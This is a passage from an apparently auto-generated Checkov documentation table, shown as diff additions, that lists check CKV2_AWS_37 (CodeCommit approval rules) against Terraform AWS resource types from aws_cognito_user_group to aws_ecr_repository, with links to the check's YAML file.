[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1008 | CKV2_AWS_37 | resource | aws_cognito_user_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1009 | CKV2_AWS_37 | resource | aws_cognito_user_pool | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1010 | CKV2_AWS_37 | resource | aws_cognito_user_pool_client | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1011 | CKV2_AWS_37 | resource | aws_cognito_user_pool_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1012 | CKV2_AWS_37 | resource | aws_config_aggregate_authorization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1013 | CKV2_AWS_37 | resource | aws_config_config_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1014 | CKV2_AWS_37 | resource | 
aws_config_configuration_aggregator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1015 | CKV2_AWS_37 | resource | aws_config_configuration_recorder | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1016 | CKV2_AWS_37 | resource | aws_config_configuration_recorder_status | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1017 | CKV2_AWS_37 | resource | aws_config_delivery_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1018 | CKV2_AWS_37 | resource | aws_config_organization_custom_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1019 | CKV2_AWS_37 | resource | aws_config_organization_managed_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1020 | CKV2_AWS_37 | resource | aws_cur_report_definition | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1021 | CKV2_AWS_37 | resource | aws_customer_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1022 | CKV2_AWS_37 | resource | aws_datapipeline_pipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1023 | CKV2_AWS_37 | resource | aws_datasync_agent | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1024 | CKV2_AWS_37 | resource | aws_datasync_location_efs | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1025 | CKV2_AWS_37 | resource | aws_datasync_location_nfs | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1026 | CKV2_AWS_37 | resource | aws_datasync_location_s3 | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1027 | CKV2_AWS_37 | resource | aws_datasync_location_smb | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1028 | CKV2_AWS_37 | resource | aws_datasync_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1029 | CKV2_AWS_37 | resource | aws_dax_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1030 | CKV2_AWS_37 | resource | aws_dax_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1031 | CKV2_AWS_37 | resource | aws_dax_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1032 | CKV2_AWS_37 | resource | aws_db_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1033 | CKV2_AWS_37 | resource | aws_db_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1034 | CKV2_AWS_37 | resource | 
aws_db_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1035 | CKV2_AWS_37 | resource | aws_db_instance_role_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1036 | CKV2_AWS_37 | resource | aws_db_option_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1037 | CKV2_AWS_37 | resource | aws_db_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1038 | CKV2_AWS_37 | resource | aws_db_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1039 | CKV2_AWS_37 | resource | aws_db_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1040 | CKV2_AWS_37 | resource | aws_db_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1041 
| CKV2_AWS_37 | resource | aws_default_network_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1042 | CKV2_AWS_37 | resource | aws_default_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1043 | CKV2_AWS_37 | resource | aws_default_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1044 | CKV2_AWS_37 | resource | aws_default_subnet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1045 | CKV2_AWS_37 | resource | aws_default_vpc | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1046 | CKV2_AWS_37 | resource | aws_default_vpc_dhcp_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1047 | CKV2_AWS_37 | resource | aws_devicefarm_project | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1048 | CKV2_AWS_37 | resource | aws_directory_service_conditional_forwarder | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1049 | CKV2_AWS_37 | resource | aws_directory_service_directory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1050 | CKV2_AWS_37 | resource | aws_directory_service_log_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1051 | CKV2_AWS_37 | resource | aws_dlm_lifecycle_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1052 | CKV2_AWS_37 | resource | aws_dms_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1053 | CKV2_AWS_37 | resource | aws_dms_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1054 | CKV2_AWS_37 | resource | 
aws_dms_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1055 | CKV2_AWS_37 | resource | aws_dms_replication_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1056 | CKV2_AWS_37 | resource | aws_dms_replication_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1057 | CKV2_AWS_37 | resource | aws_dms_replication_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1058 | CKV2_AWS_37 | resource | aws_docdb_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1059 | CKV2_AWS_37 | resource | aws_docdb_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1060 | CKV2_AWS_37 | resource | aws_docdb_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1061 | CKV2_AWS_37 | resource | aws_docdb_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1062 | CKV2_AWS_37 | resource | aws_docdb_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1063 | CKV2_AWS_37 | resource | aws_dx_bgp_peer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1064 | CKV2_AWS_37 | resource | aws_dx_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1065 | CKV2_AWS_37 | resource | aws_dx_connection_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1066 | CKV2_AWS_37 | resource | aws_dx_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1067 | CKV2_AWS_37 | resource | aws_dx_gateway_association | Ensure CodeCommit 
associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1068 | CKV2_AWS_37 | resource | aws_dx_gateway_association_proposal | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1069 | CKV2_AWS_37 | resource | aws_dx_hosted_private_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1070 | CKV2_AWS_37 | resource | aws_dx_hosted_private_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1071 | CKV2_AWS_37 | resource | aws_dx_hosted_public_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1072 | CKV2_AWS_37 | resource | aws_dx_hosted_public_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1073 | CKV2_AWS_37 | resource | aws_dx_hosted_transit_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1074 | CKV2_AWS_37 | resource | aws_dx_hosted_transit_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1075 | CKV2_AWS_37 | resource | aws_dx_lag | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1076 | CKV2_AWS_37 | resource | aws_dx_private_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1077 | CKV2_AWS_37 | resource | aws_dx_public_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1078 | CKV2_AWS_37 | resource | aws_dx_transit_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1079 | CKV2_AWS_37 | resource | aws_dynamodb_global_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1080 | CKV2_AWS_37 | resource | 
aws_dynamodb_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1081 | CKV2_AWS_37 | resource | aws_dynamodb_table_item | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1082 | CKV2_AWS_37 | resource | aws_ebs_default_kms_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1083 | CKV2_AWS_37 | resource | aws_ebs_encryption_by_default | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1084 | CKV2_AWS_37 | resource | aws_ebs_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1085 | CKV2_AWS_37 | resource | aws_ebs_snapshot_copy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1086 | CKV2_AWS_37 | resource | aws_ebs_volume | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1087 
| CKV2_AWS_37 | resource | aws_ec2_availability_zone_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1088 | CKV2_AWS_37 | resource | aws_ec2_capacity_reservation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1089 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_authorization_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1090 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1091 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_network_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1092 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1093 | CKV2_AWS_37 | resource | aws_ec2_fleet | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1094 | CKV2_AWS_37 | resource | aws_ec2_local_gateway_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1095 | CKV2_AWS_37 | resource | aws_ec2_local_gateway_route_table_vpc_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1096 | CKV2_AWS_37 | resource | aws_ec2_tag | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1097 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1098 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_filter_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1099 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_session | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1100 | CKV2_AWS_37 | resource | 
aws_ec2_traffic_mirror_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1101 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1102 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_peering_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1103 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_peering_attachment_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1104 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1105 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1106 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1107 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table_propagation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1108 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_vpc_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1109 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_vpc_attachment_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1110 | CKV2_AWS_37 | resource | aws_ecr_lifecycle_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1111 | CKV2_AWS_37 | resource | aws_ecr_repository | Ensure CodeCommit 